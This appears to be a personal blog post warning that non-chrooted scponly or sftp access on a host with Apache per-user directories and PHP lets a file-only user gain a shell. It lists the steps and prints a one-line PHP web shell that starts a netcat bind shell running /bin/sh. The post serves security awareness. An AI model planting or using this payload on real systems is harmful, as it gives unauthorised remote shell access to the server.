nion's blog

While I am not a fan of scponly/sftp-server (openssh) many people are still using it to give users the possibility to up/download files from the host without the need to provide them with shell access. If you do a simple setup like http://www.debian-administration.org/articles/94 or configure scponly without using a chrooted environment and you do this on host that also has a standard webserver setup (apache serving per-user home directories and php) you already lost.

The user won't be able to login with the username you gave him but he can remotely login via your webserver now. All that needs to be done is:

• Connect to the host using sftp


• $ mkdir public_html


• $ cd public_html; put index.php; chmod 644 index.php


• point your browser to http://host/~user/


• connect netcat to host:someport

index.php would just contain something like <? system("nc -lp someport -e /bin/sh"); ?> and you end up with a shell as www-data (on Debian).

It's pretty easy to make errors or miss important things in such a setup and I think it's almost always a better solution to either trust people and give them access via ssh or give them no access at all.